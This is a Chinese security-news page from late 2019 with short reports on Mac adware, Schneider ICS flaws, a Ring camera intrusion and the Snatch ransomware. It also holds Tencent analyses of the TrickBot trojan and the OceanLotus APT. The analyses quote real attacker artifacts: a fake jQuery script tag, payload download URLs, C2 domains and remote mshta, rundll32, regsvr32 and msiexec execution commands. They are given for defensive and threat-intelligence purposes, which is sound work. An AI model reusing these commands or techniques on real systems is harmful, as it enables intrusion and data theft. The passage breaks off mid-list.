分类: 黑客事件

Malwarebytes 报告:2019 Mac 威胁检测呈上升趋势

根据 Malwarebytes 发布的 2019 威胁检测报告,今年针对 Mac 平台的威胁有上升的趋势。在排名前 25 的威胁检测中,有六种针对 Mac 平台,占总量的 16% 。尽管看似并不严重,但鉴于 Mac 用户基数只占 PC 用户群体的 1 / 12,这项发现还是不由地让我们提高了警惕。 Mac 广告软件(图自:Malwarebytes,via MacRumors) 回顾 2019 年,Mac 恶意软件首次闯入了前五,并在其中占据了两席(位列第二和第五)。 首先是被称作 NewTab 的 Mac 广告软件,其占据了跨平台检测总数的 4% 。 作为一款基于浏览器扩展程序来修改网页内容的 Adware,其可在 Chrome 浏览器中找到。 因苹果修改了扩展程序的政策,因此其无法再安装到 Safari 浏览器中。 其次是占总检测量 3% 的 PUP.PCVARK: PUP 指代‘可能不需要的程序’,是用户无意间安装的 Mac 程序的集合。 (Windows / Mac 双平台单机检测量对比) Malwarebytes 指出:2019 年,每台 Mac 检测了 9.8 次,而 Windows PC 仅为 4.2 次。 问题在于,长期以来,许多 Mac 用户以为自己并不需要防病毒软件。若悲观猜测,这些 Mac 可能已经受到了某种可疑的感染。 当然,数据仅采集自已经安装了 Malwarebytes 的设备。在现实生活中,所有 Mac 的总体威胁检测率,可能不如样本数据中那样高。   (稿源:cnBeta,封面源自网络。)

施耐德修复了 Modicon 和 EcoStruxure 产品中的 DoS 漏洞

施耐德电气公司近期解决了Modicon M580,M340,Quantum和Premium控制器中的DoS漏洞,并表示这三个缺陷都是由于检查不当造成的。 这三个漏洞是: 第一个是CVE-2019-6857,CVSS v3.0 的基本评分为 7.5,具有高危险性。使用Modbus TCP读取特定的存储器块时,该漏洞可能导致控制器遭遇DoS攻击。 CVE-2019-6856,CVSS v3.0 评分同样为 7.5,具有高危险性。在使用Modbus TCP编写特定的物理内存块时可能会导致DoS 攻击。 第三个漏洞编号为CVE-2018-7794,CVSS v3.0 评分为 5.9,为中度危险。当使用Modbus TCP读取的数据的索引无效时,该漏洞可能导致DoS攻击。 来自Nozomi Networks的Mengmeng Young和Gideon Guo(CVE-2019-6857),Chansim Deng(CVE-2019-6856)和Younes Dragoni(CVE-2018-7794)已报告了漏洞。 施耐德还告知其用户,EcoStruxure下有三个产品( Power SCADA Operation 的电源监控软件等)出现了多个漏洞。 根据Applied Risk的报告,漏洞源于一个严重堆栈溢出漏洞,黑客可以利用该漏洞触发DoS。 报告还指出:“Schneider ClearSCADA出现了一个文件权限引发的漏洞。黑客由此可以修改系统配置和数据文件。” 施耐德电气还发现了EcoStruxure Control Expert编程软件中的一个中级漏洞(该软件为Modicon可编程自动化控制器提供服务),该漏洞可能使黑客绕过软件与控制器之间的身份验证过程。     消息来源:SecurityAffairs, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

黑客攻破美一女孩房间安全摄像头并称自己是圣诞老人

据外媒报道,有人黑进了美国密西西比一户人家的环形安全摄像头,并且还用扬声器骚扰这家的8岁女孩。这名黑客告诉她自己是圣诞老人并还怂恿她破坏房间。这是近期发生的几起黑客在用户不知情的情况下登陆其Ring账号的攻击事件之一。 Ashley LeMay近日告诉媒体,她在自己女儿房间里安装了摄像头,这样她就可以在上夜班时照看她们。“在我买到它们之前做了很多研究。你知道,我真的觉得它是安全的。” 然而这次入侵就发生在她安装这款摄像头四天后,当时她正在出差,她的丈夫在家带孩子。 当她的女儿Alyssa听到自己卧室传出来声音后于是走进去看看究竟是什么。 从当事人分享的视频可以看到,Alyssa非常紧张地站在自己的房间里,黑客则远程播放了来自恐怖片《潜伏》里的歌曲《Tiptoe through the Tulips》。 “谁在那里,”Alyssa问道。 “我是你最好的朋友。我是圣诞老人。我是圣诞老人。难道你不想成为我最好的朋友吗?”黑客说道。 之后,这个匿名黑客继续骚扰Alyssa、嘲笑她并怂恿她破坏房间。 对此,这款摄像头厂商Ring在提供给媒体的声明中指出,黑客并不是通过数据泄露或破坏Ring的安全获取信息的,相反,这个人可能利用了这户人家账户的安全性。 根据声明,Ring用户经常会使用相同的用户名和密码来注册不同账户和订阅服务。“作为预防措施,我们强烈并公开鼓励所有Ring用户在其Ring账户上启用双重认证、添加共享用户(而不是共享登录凭证)、使用高安全性密码并定期更换密码。” Ashley表示,她还没有在她的设备上设置双重认证。   (稿源:cnBeta,封面源自网络。)

微软警告 GALLIUM 黑客组织瞄准全球电信供应商

微软专家指出:GALLIUM黑客组织利用未修补的漏洞运行/JBoss应用服务器系统。 “目前微软威胁情报中心(MSTIC)在对GALLIUM黑客组织行为逐步了解中发现,其目标是电信供应商,为了破坏其目标网络,GALLIUM利用WildFly/JBoss中的公开漏洞对未修复的网络服务进行攻击。” GALLIUM 的行为表现活跃,尤其是2018年至2019年间格外明显。而攻击者一旦破坏了目标网络,他们将会使用常见的科技手段如Mimikatz来窃取可用的凭证。 专家指出,目前GALLIUM 正在使用一些版本常见的软件以及公开化的一些工具,这工具只需稍作改动,就可以逃避检测。运营商利用低成本和易于替换的基础设施,使用动态DNS域和定期重用的跃点。 MSTIC分析指出:使用动态DNS提供商而不是符合条件的注册域名,GALLIUM的低成本、低投入成为运营趋势。 在中国大陆、中国香港和中国台湾的基础设施中,且已观察到GALLIUM基础设施建设。 威胁行为很大程度上依赖于网络shell,通过此shell获得持久网络稳定,然后进行恶意软件传输。在这个阶段中,恶意软件的有效负载将会被舍弃,且不会通过稳定网络进行程序安装。 除了标准的 China Chopper外,该公司还为微软IIS服务器运行使用了一个名为blackmold的原生web shell。Blackmold能够找到出本地驱动器,并进行基本的文件操作如查找、读取、写入、删除和复制,设置文件属性,渗透文件,并使用参数运行cmd.exe。 该黑客组织还会提供个性化的Gh0st RAT和Poison Ivy服务版本,这两个版本都会修改软件使用通信方法。黑客还将QuarkBandit作为第二级恶意软件,专家称该软件具有修改配置选项和加密的Gh0st RAT变体。日前,研究人员还通过观察发现 GALLIUM使用VPN来进行网络持久的访问。 针对此问题,微软在报告中还公布了一份IOC指标列表。   消息来源:SecurityAffairs, 译者:dengdeng,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

卡巴斯基透露有黑客同时利用 Windows 10 和 Chrome 零日漏洞发动攻击

微软和谷歌都已经在昨天发布软件更新用于修复部分安全漏洞,这其中就包括某个在野外已遭到利用的零日漏洞。这些零日漏洞由卡巴斯基发现但是高级黑客团体早已利用,黑客借助这些漏洞可以直接在计算机上安装间谍软件。而经过溯源后卡巴斯基指出无法将攻击者归于任何特定攻击者,但攻击者使用的部分代码与拉撒路集团有相似性。 拉撒路集团是知名勒索软件WannaCry的始作俑者,而该集团也被安全公司认为是由北韩资助的国家级黑客团队。 利用漏洞攻击韩语新闻网站加载恶意软件: 卡巴斯基调查后发现最初攻击者利用某韩语新闻网站的漏洞嵌入恶意脚本,当用户浏览该网站时就会加载该脚本。 而这个恶意脚本里有代码是专门针对Google Chrome 的,黑客利用的漏洞是谷歌官方此前并未发现的零日漏洞。 恶意脚本被加载后会再调用Win32K 安全漏洞下载并安装恶意软件,该恶意软件会自动连接远程服务器获取指令。 也就是说主要用户浏览这个韩语网站就会被感染恶意软件,在这期间不需要用户执行任何交互动作即可完成攻击。 #攻击者将恶意脚本伪装成流行的jQuery库 卡巴斯基称这次攻击事件为Operation WizardOpium<script type="text/javascript" scr="hxxp://code.jquery.cdn.behindcorona.com/jquery-validates.js"></script> 潜在攻击者可能是拉撒路集团: 卡巴斯基在经过溯源和分析后表示没有确切证据能够将此次攻击事件与任何已知的高级持续性威胁团体关联起来。 但攻击者使用的相关代码与拉撒路集团有非常弱的相似性,这表明潜在的攻击团体可能是名声在外的拉撒路集团。 拉撒路集团曾发动过多次知名的网络攻击,包括WannaCry勒索软件、孟加拉国家银行失窃案、远东银行失窃案。 而该集团也被证实是北韩资助的国家级黑客组织,这次攻击的载体是韩语新闻网站也就是说主要目标是韩国用户。 因此按常理推测的话此次攻击是拉撒路集团发动的可能性非常大,不过卡巴斯基称暂时没有足够多的确切的证据。 卡巴斯基认为相关攻击代码与拉撒路集团有非常弱的相似性也可能是其他攻击者试图将调查视线转到拉撒路身上。 微软已经在例行更新中修复漏洞: 事实上这次安全漏洞不仅影响Windows 10, 据微软官方说明所有受支持的Windows版本包括服务器版均受影响。 出现安全漏洞的依然是最近非常热门的Win32K 组件,该组件从去年年底到现在已经被发现多个高危的零日漏洞。 微软表示攻击者借助此漏洞可以在内核模式下运行任意代码,包括安装软件、删改数据或新增同权限的用户账户。 受影响的版本包括Windows 7 SP1~Windows 10所有版本、Windows Server 2008 R2 到Server 2019版等等。 当然Windows 7 SP1之前的版本例如XP以及Windows 10已经停止支持的版本比如1803之前的版本也会受影响。 不过这些已经停止支持的版本并没有安全更新用于修复漏洞,所以建议用户们还是尽早升级受支持的版本比较好。 谷歌也已经修复零日漏洞: 这次攻击者同时利用Windows操作系统和Google Chrome漏洞比较罕见,不过现在这个漏洞利用方式已被封堵。 谷歌浏览器开发团队在接到卡巴斯基报告后已经及时修复漏洞,用户只要开启自动更新就可以自动升级到最新版。 目前谷歌浏览器在国内已经部署服务器可以提供更新,用户也可以点击这里访问中国官网下载谷歌浏览器安装包。   (稿源:cnBeta,封面源自网络。)

新型恶意程序 Snatch 曝光:进入安全模式加密数据向受害者勒索比特币

Sophos的安全研究团队近日发现了名为Snatch的勒索软件,利用Windows的功能来绕过安装在PC上的安全软件。这款勒索软件会让你的PC崩溃,并迫使受感染设备重新启动进入安全模式。而在安全模式下,通常会禁用防病毒和其他安全软件,从而允许该恶意程序作为服务进行自启,对PC进行全盘加密,最后向受害者勒索比特币。 在过去3个月内,Sophos已经收到了12例关于该勒索软件的反馈报告,要求比特币赎金在2900美元至51,000美元之间。在安全公告中写道:“Snatch可以在常见的Windows系统上运行,从Windows 7到Windows 10,所有32位和64位版本都受到影响。我们观察到Snatch无法在Windows以外的平台上运行。” (稿源:cnBeta,封面源自网络。)

TrickBot 银行木马传入我国,专门窃取国外银行登录凭据

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/nh-j3Zv1DTVg_xkIsjlLMQ   一、背景 腾讯安全御见威胁情报中心检测到TrickBot银行木马活跃,黑客在钓鱼文档中嵌入恶意VBA代码,宏代码通过创建和执行CMD脚本以及VBS脚本下载和传播银行木马TrickBot。监测数据显示,该木马已影响我国部分企业,中毒电脑系统信息及访问国外银行的登录信息会被窃取,受TrickBot银行木马影响较严重的地区为浙江,广东,北京等地。 TrickBot在2016年左右被发现,会在受害者通过浏览器访问在线银行时窃取网银信息,攻击目标包括澳大利亚、新西兰、德国、英国、加拿大、美国、以色列和爱尔兰等国银行系统,有国外研究者认为该组织已收集了2.5亿个电子邮箱。 TrickBot首次感染系统后,会安装计划任务“Ms visual extension”反复执行木马,然后将恶意代码注入Svchost.exe,下载多个加密的DLL模块,最终将injectdll32(64)注入浏览器进程,捕获与目标银行相关的HTTP请求并复制发送至C&C服务器。 TrickBot攻击流程 二、详细分析 当受害者打开恶意Word文档时,会显示如下图所示界面: 初次打开文档时,Office会提示是否允许宏执行,若选择允许,则文档界面中会提示一条告警消息,但是实际上后台VBA代码正在C:\Resources目录下创建5个后缀为.cmd的文件,然后通过CreateProcessA执行c:\Resources\BC4603BB450B14.cmd。 之后,BC4603BB450B14.cmd创建用于下载文件的VBS脚本pscolor.vbs, 并使用该脚本从https[:]//allpetsandpaws.com/DOYJIABZB.res或 http[:]//rygseminarios.com/egprod40.eof下载nas6.exe。 nas6.exe搜集当前系统CPUID序列号发送至https[:]//magnwnce.com/photo.png?id=,然后从http[:]//149.154.67.19/tin.exe下载Trickbot。 Trickbot重命名自身为“с그의길습을든意すスっジюл.EXE”,并拷贝到%ProgramData%和%Roaming%\swapper\目录下。重命名的文件名包含字母,韩文,中文,日文和保加利亚语,这会导致部分调试器无法加载该文件。 接着将木马安装为计划任务“Ms visual extension”,设置触发器在系统启动时木马执行一次,之后每隔11分钟执行一次。 定时任务触发后,taskeng.exe启动с그의길습을든意すスっジюл.EXE,然后将恶意代码注入子进程svchost.exe继续执行,进程树如下图所示。 TrickBot下载8个模块importDll64(或importDll32) ,injectDll64,mshareDll64,mwormDll64,networkDll64,pwgrab64,systeminfo64,tabDll64。同时下载所需配置文件存放到四个目录injectDll64_configs,networkDll64_configs,pwgrab64_configs,tabDll64_configs下。 systeminfo64负责收集受害者的系统信息,包括其Windows版本、CPU类型、RAM容量、用户帐户、已安装的软件和服务,不同信息字段以符号“aksgja8s8d8a8s97”进行分割并上传至服务器。 injectDll64最终能够将恶意代码注入Web浏览器(IE、Chrome和Firefox)从而窃取受害者的在线银行信息。被注入到svchost.exe执行时,injectDll64会枚举所有正在运行的进程,通过比较进程名来检查它是否是浏览器(包括“Chrome”、“IE”和“Firefox”浏览器)。 在选择一个进程之后,它创建一个命名管道(使用进程ID与一个常量字符串进行组合作为管道的名称),使用这个命名管道在svchost.exe和浏览器之间进行通信,以传输Sinj、dinj和dport的内容,之后InjectDll准备要注入到浏览器中的代码,并调用CreateRemoteThread执行注入。 TrickBot在一个线程中将银行信息(即Sinj、dinj和dpost的内容)传输到浏览器,之后在另一个线程中对WinInet和NSS3API的导出函数上设置钩子,从而利用注入的代码捕获来自浏览器的所有HTTP请求。 本地钩子函数能够使用银行信息对HTTP请求进行进一步的过滤,如果HTTP请求与目标银行匹配,则将该HTTP请求复制并发送到C&C服务器。 三、安全建议 中国国内在线银行系统普遍采用“U盾”来做登录认证、加密网银系统通信,TrickBot银行木马暂不能直接威胁国内网银资金安全,但对于国外银行系统的安全威胁却不容小视。腾讯安全专家建议用户采取以下安全措施,防止受害: 1、建议不要打开不明来源的邮件附件,对于邮件附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描; 2、建议升级office系列软件到最新版本,对陌生文件中的宏代码坚决不启用; 3、推荐企业用户部署腾讯御点终端安全管理系统防御病毒木马攻击,个人用户启用腾讯电脑管家的安全防护功能; 4、推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统; IOCs IP 149.154.67.19 181.129.104.139 170.238.117.187 Domain allpetsandpaws.com rygseminarios.com URL https[:]//allpetsandpaws.com/DOYJIABZB.res http[:]//rygseminarios.com/egprod40.eof http[:]//149.154.67.19/tin.exe http[:]//presifered.com/data3.php md5 c04f5dc534fa5b1acef3c08d9ab3f3cb 1c132ca1ec8b89977c0e3ee28763e3fc 参考链接: https://www.fortinet.com/blog/threat-research/deep-analysis-of-the-online-banking-botnet-trickbot.html https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/(原文已被删,快照可供参考)  

“海莲花”(OceanLotus) 2019 年针对中国攻击活动汇总

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/OA09fndsHfpLVxeo7DnjYg   一、概述 “海莲花”(又名APT32、OceanLotus),被认为是来自越南的APT攻击组织,自2012年活跃以来,一直针对中国大陆的敏感目标进行攻击活动,是近几年来针对中国大陆进行攻击活动最活跃的APT攻击组织,甚至没有之一。 腾讯安全御见威胁情报中心曾在2019年上半年发布过海莲花组织2019年第一季度攻击活动报告,在报告发布之后一直到现在,我们监测到该组织针对中国大陆的攻击持续活跃。该组织的攻击目标众多且广泛,包括中国大陆的政府部门、海事机构、外交机构、大型国企、科研机构以及部分重要的私营企业等。并且我们监测到,有大量的国内目标被该组织攻击而整个内网都沦陷,且有大量的机密资料、企业服务器配置信息等被打包窃取。 此外我们发现,该组织攻击人员非常熟悉我国,对我国的时事、新闻热点、政府结构等都非常熟悉,如刚出个税改革时候,就立马使用个税改革方案做为攻击诱饵主题。此外钓鱼主题还包括绩效、薪酬、工作报告、总结报告等。 而从攻击的手法上看,相对第一季度变化不是太大,但有一些小的改进,包括攻击诱饵的种类、payload加载、绕过安全检测等方面。而从整体攻击方式来看,依然采用电子邮件投递诱饵的方式,一旦获得一台机器的控制权后,立即对整个内网进行扫描和平移渗透攻击等。这也进一步说明了APT攻击活动不会因为被曝光而停止或者有所减弱,只要攻击目标存在价值,攻击会越来越猛烈,对抗也会越来越激烈。 有关海莲花APT组织2019年对中国大陆攻击情况的完整技术报告,请参考: https://pc1.gtimg.com/softmgr/files/apt32_report_2019.pdf 二、攻击特点 2.1  钓鱼邮件的迷惑性 海莲花组织擅长使用鱼叉攻击,通过大量精准发送钓鱼邮件来投递恶意附件的方式进行攻击。整个2019年,持续对多个目标不断的进行攻击,如下列钓鱼邮件: 从邮件主题来看,大部分邮件主题都非常本土化,以及贴近时事热点。邮件主题包括: 《定-关于报送2019年度经营业绩考核目标建议材料的报告》、《组织部干部四处最新通知更新》、《关于2019下半年增加工资实施方案的请示(待审)》、《2019年工作报告提纲2(第四稿)》、《2019年5月标准干部培训课程通知》等等。 我们在2019年第一季度的报告中还提到海莲花组织采用敏感内容主题钓鱼邮件,不过在之后的攻击中并未再次发现使用该类型诱饵: 此外,投递钓鱼邮件的账号均为网易邮箱,包括126邮箱和163邮箱,账号样式为:名字拼音+数字@163(126).com,如: Sun**@126.com、yang**@126.com、chen**@126.com、zhao**@163.com、reny**@163.com等。 2.2  诱饵类型的多样化 海莲花组织所使用的诱饵类型众多,能想到的诱饵类型海莲花几乎都用过。除了我们在第一季度报告里提到的白加黑、lnk、doc文档、WinRAR ACE漏洞(CVE-2018-20250)的压缩包等类型外,之后的攻击中还新增了伪装为word图标的可执行文件、chm文件等。 可执行文件诱饵: Chm诱饵: 白加黑诱饵: 带有宏的恶意office文档: 恶意lnk: 带有WinRAR ACE(CVE-2018-20250)漏洞的压缩包: 2.3  载荷执行方式多变 由于诱饵的多样化,载荷执行的方式也多变。此外第二阶段的加载方式同样方式众多。 1、 直接执行可执行文件 如该诱饵,伪装为word图标的可执行文件,并在文件描述里修改成了Microsoft DOCX,用于迷糊被钓鱼者。执行恶意文件后,会释放诱饵文档2019年5月标准干部培训课程通知.docx,并且打开,让受害者以为打开的就是word文档。而打开后的文档为模糊处理的文档,诱使受害者启用文档中的宏代码以查看文档内容,实际上启用宏之后,仍然看不到正常的内容: 2、 使用rundll32加载恶意dll 如某诱饵在执行后,会在C:\Users\Administrator\AppData\Local\Microsoft目录释放真正的恶意文件{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll,然后使用rundll32来执行该dll:”C:\Windows\system32\rundll32.exe” “C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll”,Register 3、 宏 使用宏来执行载荷,且宏代码经过的混淆处理: 4、 Office内存执行恶意shellcode 使用宏代码,在office中直接解密shellcode,在内存中创建线程执行: 5、 dll侧加载(白加黑) 使用dll侧加载(DLL Side-Loading)技术来执行载荷,通俗的讲就是我们常说的白加黑执行。 其中所使用的宿主文件对包括: 白文件原名 黑dll文件名 iTunesHelper.exe AppVersions.dll SGTool.exe Inetmib1.dll Rar.exe ldvptask.ocx GoogleUpdate.exe goopdate.dll 360se.exe chrome_elf.dll Winword.exe wwlib.dll rekeywiz.exe mpr.dll wps.exe krpt.dll wechat.exe WeChatWin.dll 6、 通过com技术执行 通过com技术,把某恶意dll注册为系统组建来执行: 7、 Chm内嵌脚本 Chm执行后,会提示执行ActiveX代码: 其脚本内容为: 不过由于编码处理的问题,该chm打开后为乱码: 而通过手动解压后,原始内容如下: 8、 使用计划任务进行持久性攻击 如上面的chm诱饵执行后,会在%AppData%\Roaming下释放文件bcdsrv.dll,然后创建名为MonthlyMaintenance的计划任务: 命令行为:C:\Windows\System32\msiexec.exe -Y C:\Users\Administrator\AppData\Roaming\bcdsrv.dll bcdsrv.dll为真正的恶意文件。 9、 lnk调用mstha执行 该方法的详细分析在之前的《海莲花2019年第一季度攻击披露》: 执行lnk后,会调用命令:C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html,而news.html实际为一个vbs脚本文件。 10、 使用odbcconf.exe加载文件: odbcconf.exe为系统自带的一个文件,该文件可以用来执行dll文件,而由于宿主进程为系统文件,因此可以逃避一些安全软件的拦截: 11、WinRAR ACE(CVE-2018-20250)漏洞 带有该漏洞的压缩包,可以构造为:解压后除了会解压出正常的文件外,再在启动目录(C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup)释放一个自解压文件: 该文件为一个自解压程序,等启动后,会释放一个{7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx文件,然后执行命令regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx执行: 2.4  多重载荷攻击 我们在最新的攻击活动中,我们首次发现海莲花使用了多重载荷的攻击。 之前的攻击活动中,都是解密shellcode后,就直接执行最终的RAT,如: 而在最新的攻击活动中,我们发现,解密shellcode后,会先下载shellcode执行,如果下载不成功,再来加载预先设定好的RAT: 这样使得攻击活动更加的丰富和多样性,并且也可控。 2.5  与安全软件对抗激烈 海莲花也采用了多种对抗安全软件的方式,主要为: 1、 dll的侧加载(白加黑) 该技术上面已详细描述,这里不再赘述。 2、 使用系统文件来执行: 如odbcconf.exe 3、 Office中直接内存执行shellcode 上文也已经描述,这里也不再展开。 4、 添加垃圾数据以扩充文件大小 为了防止该文件被安全厂商收集,海莲花组织特意在某些文件的资源中添加大量的垃圾数据的方式以扩充文件大小。 如某文件,填充垃圾数据后,文件大小高达61.4 MB (64,480,256 字节): 5、 每台机器的第二阶段后门都是定制的 每台机器的第二阶段后门文件都是根据当前机器的机器属性(如机器名)来加密定制的,因此每台机器上的文件hash都是不一样,且没这台机器的相关信息则无法解密。因此且即便被安全厂商捕捉,只要没有这台机器的相关遥感数据就无法解密出真正的payload。详细的见后文的”定制化后门”部分。 6、 通信的伪装 如某次攻击中C2的伪装:根据配置信息,可进行不同的连接和伪装,对C2进行拼装后再进行解析。拼接方式为(xxx为配置C2): {rand}.xxx www6.xxx cdn.xxx api.xxx HTTP Header的伪装: 2.6  定制化的后门 使用定制化的后门(主要是第二阶段下发的后门),海莲花组织在2019年所使用的技术中最令人印象深刻的。该技术我们曾经在《2019年海莲花第一季度攻击报告》中首次曝光:针对每台机器下发的恶意文件,都使用被下发机器的相关机器属性(如机器名)进行加密,而执行则需要该部分信息,否则无法解密。因此每个下发的恶意文件都不一样,而且即便被安全厂商捕捉,只要没有该机器的相关遥感数据就无法解密出真正的payload。 该后门最终使用白加黑的方式来执行,包括AdobeUpdate.exe+goopdate.dll、KuGouUpdate.exe+goopdate.dll、 XGFileCheck.exe + goopdate.dll、SogouCloud.exe+ inetmib1.dll等组合来执行。 加密流程为: 可以看到,某次针对国家某单位的攻击中,使用的密钥为: 而该受害的用户名为Cao**,可见该木马只专门为了感染该电脑而特意生成的。 2.7  多种恶意软件的选择 从我们的长期跟踪结果来看,海莲花组织使用最终的恶意软件(无论是第一阶段后门还是第二阶段后门)主要有三种,分别是CobaltStrike的beacon木马、Denis家族木马、修改版的Gh0st。其中CobaltStrike和Denis使用的最多,而修改版的Gh0st则比较少见。 CobaltStrike: Denis: 修改版Gh0st: 2.8  持续的内网渗透 通过钓鱼攻击攻陷一台主机后,海莲花还会不断对被攻击的内网进行渗透攻击活动,以此来渗透到更多的内网机器: 扫描: 获取hash: 打包文件: 此外,还会还会通过powershell,创建计划任务来下载持久化的工具: 最终的恶意文件为goopdate.dll,跟上文所述的第二阶段下发后门一致。 三、可能存在的假旗活动 在跟踪海莲花的过程中,我们还发现了一些跟海莲花活动类似的攻击: 如: 可以看出该批活动跟海莲花的类似:如关键字、使用白加黑等。 而该文件最终的执行的恶意代码为两种: 一种是CobaltStrike生成的Beacon payload; 另一种是metasploit生成的block_reverse_http的paylaod。 虽然CobaltStrike的Beacon木马海莲花组织一直在进行使用,但是之前未发现有metasploit生成的payload,这似乎跟之前的海莲花攻击活动又有些不一致。 此外该批活动的c2都在中国境内(包括中国香港),这似乎跟之前的攻击活动也不大一样: 虽然这波活动在极力模仿海莲花的一些攻击行为,但是也依然存在不同的地方。因此暂未有更多的证据可以表明该活动归属于海莲花还是其他组织使用的假旗(false flag)活动。因此在这先不做定论,等待更多的证据和关联的依据。 四、总结 海莲花组织是近年来针对中国大陆的敏感部门进行攻击最活跃的APT组织,甚至没有之一。当然该组织也是被安全公司曝光的针对中国大陆攻击活动报告最多的APT攻击组织。尽管被安全厂商频繁曝光,该组织并未有停手迹象,反而不断更新其技术和武器库,包括诱饵、payload、新的漏洞利用等,此外也有众多跟杀软的对抗手段,如自增文件大小、混淆方式、定制化的payload等。 因此我们提醒相关部门和相关人员,切记提高安全意识,不要随意执行来历不明的邮件的附件,不要被钓鱼信息所蒙蔽。 五、安全建议 1、 提升安全意识,不要打开来历不明的邮件的附件;除非文档来源可靠,用途明确,否则不要轻易启用Office的宏代码; 2、 及时安装操作系统补丁和Office等重要软件的补丁; 3、 使用杀毒软件防御可能得病毒木马攻击,对于企业用户,推荐使用腾讯御点终端安全管理系统。腾讯御点内置全网漏洞修复和病毒防御功能,可帮助企业用户降低病毒木马入侵风险; 4、 推荐企业用户部署腾讯御界高级威胁检测系统及时捕捉黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html) 六、附录 6.1  腾讯御见威胁情报中心 腾讯御见威胁情报中心,是一个涵盖全球多维数据的情报分析、威胁预警分析平台。依托腾讯安全在海量安全大数据上的优势,通过机器学习、顶尖安全专家团队支撑等方法,产生包括高级持续性攻击(APT)在内的大量安全威胁情报,帮助安全分析人员快速、准确对可疑事件进行预警、溯源分析。 腾讯御见威胁情报中心公众号自开号以来,发布了大量的威胁分析报告,包括不定期公开的针对中国大陆目标的APT攻击报告,无论是分析报告的数量上还是分析报告的质量上,都处于业界领先水平,受到了大量客户和安全专家的好评,同时发布的情报也经常被政府机关做为安全预警进行公告。 以下是腾讯御见威胁情报中心公众号的二维码,关注请扫描二维码: 6.2  IOCs MD5: e7920ac10815428de937f2fca076b94c 4095b9682af13ca1e897ca9cc097ec69 b96de3d0023542f8624b82b9773373e9 5c5f8c80dcb3283afeb092cb0c13a58a c90c7abcee1d98a8663904d739185d16 d249411f003d05c0cea012c11ba13716 3489140891e67807c550aa91c67dc4ad 22f8736bbc96c1a58ab07326d730a235 dade969b00cbc4a0c1b58eeb0e740b63 3c3b2cc9ff5d7030fb01496510ac75f2 d604c33d6ec99a87a672b3202cb60fa7 861fc5624fd1920e9d9cc7a236817dd7 8e2b5b95980cf52e99acfa95f5e1570b 3c8b2d20e428f8207b4324bb58f5d228 a81424e973b310edd50aed37590f4b8a cf5d6d28c388edf58e55412983cf804a 6b8bec74620fbf88263b48c5a11b682e 9eb55481a0b5fcd255c8fb8de1042f88 5c00063b11c4710fe5a5a1adaf208b12 d30bc57624d233d94dc53a62908ef2df 886d0dd67e4cf132a1aed84263d661e3 2b3c5c831eb6b921ac128c4d44d70a7a 1dfb41e5919af80c7d0fa163a90e21e5 C&C: 360skylar.host wechats.asis news.shangrilaexports.com clip.shangweidesign.com jcdn.jsoid.com libjs.inquirerjs.com baidu-search.net sys.genevrebreinl.com ad.ssageevrenue.com tel.caitlynwells.com us.melvillepitcairn.com upgrade.coldriverhardware.com cdnwebmedia.com 43.251.100.20 43.254.217.67 114.118.80.233 6.3  MITRE ATT&CK Tactic ID Name Initial Access T1193 Spearphishing Attachment Execution T1106 Execution through API T1129 Execution through Module Load T1203 Exploitation for Client Execution T1085 Rundll32 T1204 User Execution T1223 Compiled HTML File T1053 Scheduled Task T1117 Regsvr32 Persistence T1179 Hooking T1053 Scheduled Task T1060 Registry Run Keys / Startup Folder Defense Evasion T1107 File Deletion T1140 Deobfuscate/Decode Files or Information T1036 Masquerading T1112 Modify Registry T1027 Obfuscated Files or Information T1085 Rundll32 T1099 Timestomp T1117 Regsvr32 Credential Access T1179 Hooking T1056 Input Capture Discovery T1083 File and Directory Discovery T1046 Network Service Scanning T1135 Network Share Discovery T1057 Process Discovery T1082 System Information Discovery T1007 System Service Discovery Lateral Movement T1534 Internal Spearphishing Collection T1005 Data from Local System T1025 Data from Removable Media T1123 Audio Capture T1056 Input Capture T1113 Screen Capture T1115 Clipboard Data Command and Control T1043 Commonly Used Port T1094 Custom Command and Control Protocol T1024 Custom Cryptographic Protocol T1001 Data Obfuscation T1065 Uncommonly Used Port 6.4  参考链接 https://s.tencent.com/research/report/715.html      

欧洲刑警组织逮捕 IM-RAT 背后 13 名黑客

欧洲刑警组织于上周宣布,他们在近期的一项国际执法行动中成功打击了Imminent Monitor RAT背后的犯罪网络。 Imminent Monitor RAT是一种可以让网络犯罪分子远程完全控制受害者的计算机的工具,被卖给了14,500多名买家,受害者覆盖124个国家。 此次行动还关闭了Imminent Monitor的基础架构和销售网站,这使得新老买家都无法使用该木马。 该黑客工具一开始被作为一种合法的远程管理框架而推广,随后被广泛用于访问用户的计算机,使得黑客得以窃取用户的在线银行和其他金融帐户的登录信息。 欧洲刑警组织还于今年6月对澳大利亚和比利时的IM-RAT开发商和雇员签发了搜查令,此次行动很有可能是为了确认该工具的转售者和用户。刑警组织还在澳大利亚,哥伦比亚,捷克,荷兰,波兰,西班牙,瑞典和英国逮捕了IM-RAT的13个重要客户。 执法人员还从客户手中缉获了430多种设备,并对大量计算机和IT设备进行了分析。 IM-RAT可以使攻击者完全控制受害者的计算机,从而使他们可以在受害者不知情的情况下执行以下所列的各种恶意行为: 1.记录击键, 2.从浏览器中窃取数据和密码, 3.通过网络摄像头监视受害者, 4.下载/执行文件, 